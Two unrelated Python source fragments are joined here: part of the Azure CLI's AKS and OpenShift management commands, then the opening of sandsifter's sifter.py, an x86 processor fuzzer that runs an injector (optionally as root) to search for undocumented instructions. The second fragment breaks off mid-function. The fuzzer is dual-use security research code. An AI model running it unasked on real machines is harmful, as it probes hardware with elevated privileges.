"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
raise CLIError('Windows nodepool is not supported')
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
node_taints=taints_array
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
            # We don't need to add a role assignment for this newly created SPN
else:
        # --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
        # This reply_url is temporarily set since Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
            # add the role assignment before saving the service principal
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate that --client-secret was provided too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal)
return load_acs_service_principal(subscription_id)
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler; please specify that flag')
def _validate_autoscaler_update_counts(min_count, max_count, node_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("Current node count '{}' is not in the range of min-count and max-count.".format(node_count))
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
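# Usage sketch (hypothetical arguments): merge into the default kubeconfig
# location, or pass "-" as the path to print the kubeconfig to stdout instead.
#   _print_or_merge_credentials(os.path.expanduser('~/.kube/config'), kubeconfig,
#                               overwrite_existing=False, context_name=None)
#   _print_or_merge_credentials('-', kubeconfig, False, None)   # print only, no merge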
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
customer_admin_group_id=None):
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
    # Validate that the cluster does not already exist, since AAD rotation on OSA is not supported for now
try:
client.get(resource_group_name, name)
except CloudError:
        # If none of aad_client_app_id, aad_client_app_secret and aad_tenant_id is set, create a new AAD app
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile])
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
    # null out the AAD profile and manually add the master agent pool name, because validation complains otherwise
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _get_load_balancer_outbound_ips(load_balancer_outbound_ips):
"""parse load balancer profile outbound IP ids and return an array of references to the outbound IP resources"""
load_balancer_outbound_ip_resources = None
if load_balancer_outbound_ips:
load_balancer_outbound_ip_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ips.split(',')]
return load_balancer_outbound_ip_resources
def _get_load_balancer_outbound_ip_prefixes(load_balancer_outbound_ip_prefixes):
"""parse load balancer profile outbound IP prefix ids and return an array \
of references to the outbound IP prefix resources"""
load_balancer_outbound_ip_prefix_resources = None
if load_balancer_outbound_ip_prefixes:
load_balancer_outbound_ip_prefix_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ip_prefixes.split(',')]
return load_balancer_outbound_ip_prefix_resources
def _get_load_balancer_profile(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes):
"""parse and build load balancer profile"""
load_balancer_outbound_ip_resources = _get_load_balancer_outbound_ips(load_balancer_outbound_ips)
load_balancer_outbound_ip_prefix_resources = _get_load_balancer_outbound_ip_prefixes(
load_balancer_outbound_ip_prefixes)
load_balancer_profile = None
if any([load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ip_resources,
load_balancer_outbound_ip_prefix_resources]):
load_balancer_profile = ManagedClusterLoadBalancerProfile()
if load_balancer_managed_outbound_ip_count:
load_balancer_profile.managed_outbound_ips = ManagedClusterLoadBalancerProfileManagedOutboundIPs(
count=load_balancer_managed_outbound_ip_count
)
if load_balancer_outbound_ip_resources:
load_balancer_profile.outbound_ips = ManagedClusterLoadBalancerProfileOutboundIPs(
public_ips=load_balancer_outbound_ip_resources
)
if load_balancer_outbound_ip_prefix_resources:
load_balancer_profile.outbound_ip_prefixes = ManagedClusterLoadBalancerProfileOutboundIPPrefixes(
public_ip_prefixes=load_balancer_outbound_ip_prefix_resources
)
return load_balancer_profile
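# Hedged example (hypothetical, abbreviated resource ids): two comma-separated
# public IP ids become two ResourceReference entries on outbound_ips, while
# managed_outbound_ips and outbound_ip_prefixes stay unset because their inputs
# are None.
#   profile = _get_load_balancer_profile(
#       load_balancer_managed_outbound_ip_count=None,
#       load_balancer_outbound_ips="<ip-resource-id-1>,<ip-resource-id-2>",
#       load_balancer_outbound_ip_prefixes=None)
#   # profile.outbound_ips.public_ips -> [ResourceReference(id="<ip-resource-id-1>"),
#   #                                     ResourceReference(id="<ip-resource-id-2>")]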
|
sifter.py
|
#!/usr/bin/python
# instruction injector frontend
#
# github.com/xoreaxeaxeax/sandsifter // domas // @xoreaxeaxeax
#
# run as sudo for best results
import signal
import sys
import subprocess
import os
from struct import *
from capstone import *
from collections import namedtuple
from collections import deque
import threading
import time
import curses
from binascii import hexlify
import re
import random
import argparse
import code
import copy
from ctypes import *
INJECTOR = "./injector"
arch = ""
OUTPUT = "./data/"
LOG = OUTPUT + "log"
SYNC = OUTPUT + "sync"
TICK = OUTPUT + "tick"
LAST = OUTPUT + "last"
class ThreadState:
pause = False
run = True
class InjectorResults(Structure):
_fields_ = [('disas_length', c_int),
('disas_known', c_int),
('raw_insn', c_ubyte * 16),
('valid', c_int),
('length', c_int),
('signum', c_int),
('sicode', c_int),
('siaddr', c_int),
]
class Settings:
SYNTH_MODE_RANDOM = "r"
SYNTH_MODE_BRUTE = "b"
SYNTH_MODE_TUNNEL = "t"
synth_mode = SYNTH_MODE_RANDOM
root = False
seed = 0
args = ""
def __init__(self, args):
if "-r" in args:
self.synth_mode = self.SYNTH_MODE_RANDOM
elif "-b" in args:
self.synth_mode = self.SYNTH_MODE_BRUTE
elif "-t" in args:
self.synth_mode = self.SYNTH_MODE_TUNNEL
self.args = args
self.root = (os.geteuid() == 0)
self.seed = random.getrandbits(32)
def increment_synth_mode(self):
if self.synth_mode == self.SYNTH_MODE_BRUTE:
self.synth_mode = self.SYNTH_MODE_RANDOM
elif self.synth_mode == self.SYNTH_MODE_RANDOM:
self.synth_mode = self.SYNTH_MODE_TUNNEL
elif self.synth_mode == self.SYNTH_MODE_TUNNEL:
self.synth_mode = self.SYNTH_MODE_BRUTE
class Tests:
r = InjectorResults() # current result
IL=20 # instruction log len
UL=10 # artifact log len
il = deque(maxlen=IL) # instruction log
al = deque(maxlen=UL) # artifact log
ad = dict() # artifact dict
ic = 0 # instruction count
ac = 0 # artifact count
start_time = time.time()
def elapsed(self):
m, s = divmod(time.time() - self.start_time, 60)
h, m = divmod(m, 60)
return "%02d:%02d:%02d.%02d" % (h, m, int(s), int(100*(s-int(s))) )
class Tee(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
self.file.close()
def write(self, data):
self.file.write(data)
self.stdout.write(data)
# capstone disassembler
md = None
def disas_capstone(b):
global md, arch
if not md:
if arch == "64":
md = Cs(CS_ARCH_X86, CS_MODE_64)
else:
md = Cs(CS_ARCH_X86, CS_MODE_32)
try:
(address, size, mnemonic, op_str) = md.disasm_lite(b, 0, 1).next()
except StopIteration:
mnemonic="(unk)"
op_str=""
size = 0
return (mnemonic, op_str, size)
# ndisasm disassembler
# (ndisasm breaks unnecessary prefixes onto their own lines, which makes parsing
# the output difficult. really only useful with the -P0 flag to disallow
# prefixes)
def disas_ndisasm(b):
b = ''.join('\\x%02x' % ord(c) for c in b)
if arch == "64":
dis, errors = subprocess.Popen("echo -ne '%s' | ndisasm -b64 - | head -2" % b,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
else:
dis, errors = subprocess.Popen("echo -ne '%s' | ndisasm -b32 - | head -2" % b,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
dis = dis.split("\n")
extra = dis[1]
dis = dis[0].split(None, 4)
if extra.strip()[0] == '-':
dis[1] = dis[1] + extra.strip()[1:]
address = dis[0]
insn = dis[1]
mnemonic = dis[2]
if len(dis) > 3:
op_str = dis[3]
else:
op_str = ""
if mnemonic == "db":
mnemonic = "(unk)"
insn = ""
op_str = ""
size = len(insn)/2
return (mnemonic, op_str, size)
# objdump disassembler
# (objdump breaks unnecessary prefixes onto their own lines, which makes parsing
# the output difficult. really only useful with the -P0 flag to disallow
# prefixes)
def disas_objdump(b):
with open("/dev/shm/shifter", "w") as f:
f.write(b)
if arch == "64":
dis, errors = subprocess.Popen("objdump -D --insn-width=256 -b binary \
-mi386 -Mx86-64 /dev/shm/shifter | head -8 | tail -1",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
else:
dis, errors = subprocess.Popen("objdump -D --insn-width=256 -b binary \
-mi386 /dev/shm/shifter | head -8 | tail -1",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
dis = dis[6:] # address
raw = dis[:256*3].replace(" ","")
dis = dis[256*3:].strip().split(None, 2)
mnemonic = dis[0]
if len(dis) > 1:
op_str = dis[1]
else:
op_str = ""
if mnemonic == "(bad)":
mnemonic = "(unk)"
insn = ""
op_str = ""
size = len(raw)/2
return (mnemonic, op_str, size)
def cstr2py(s):
return ''.join([chr(x) for x in s])
# targeting python 2.6 support
def int_to_comma(x):
    if not isinstance(x, int):
raise TypeError("Parameter must be an integer.")
if x < 0:
return '-' + int_to_comma(-x)
result = ''
while x >= 1000:
x, r = divmod(x, 1000)
result = ",%03d%s" % (r, result)
return "%d%s" % (x, result)
def result_string(insn, result):
s = "%30s %2d %2d %2d %2d (%s)\n" % (
hexlify(insn), result.valid,
result.length, result.signum,
result.sicode, hexlify(cstr2py(result.raw_insn)))
return s
class Injector:
process = None
settings = None
command = None
def __init__(self, settings):
self.settings = settings
def start(self):
self.command = "%s %s -%c -R %s -s %d" % \
(
INJECTOR,
" ".join(self.settings.args),
self.settings.synth_mode,
"-0" if self.settings.root else "",
self.settings.seed
)
self.process = subprocess.Popen(
"exec %s" % self.command,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
preexec_fn=os.setsid
)
def stop(self):
if self.process:
try:
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
except OSError:
pass
class Poll:
SIGILL = 4
SIGSEGV = 11
SIGFPE = 8
SIGBUS = 7
SIGTRAP = 5
def __init__(self, ts, injector, tests, command_line, sync=False, low_mem=False, search_unk=True,
search_len=False, search_dis=False, search_ill=False, disassembler=disas_capstone):
self.ts = ts
self.injector = injector
self.T = tests
self.poll_thread = None
self.sync = sync
self.low_mem = low_mem
self.search_len = search_len
self.search_unk = search_unk
self.search_dis = search_dis
self.search_ill = search_ill
self.disas = disassembler
if self.sync:
with open(SYNC, "w") as f:
f.write("#\n")
f.write("# %s\n" % command_line)
f.write("# %s\n" % injector.command)
f.write("#\n")
f.write("# cpu:\n")
cpu = get_cpu_info()
for l in cpu:
f.write("# %s\n" % l)
f.write("# %s v l s c\n" % (" " * 28))
def start(self):
self.poll_thread = threading.Thread(target=self.poll)
self.poll_thread.start()
def stop(self):
self.poll_thread.join()
while self.ts.run:
time.sleep(.1)
def poll(self):
while self.ts.run:
while self.ts.pause:
time.sleep(.1)
bytes_polled = self.injector.process.stdout.readinto(self.T.r)
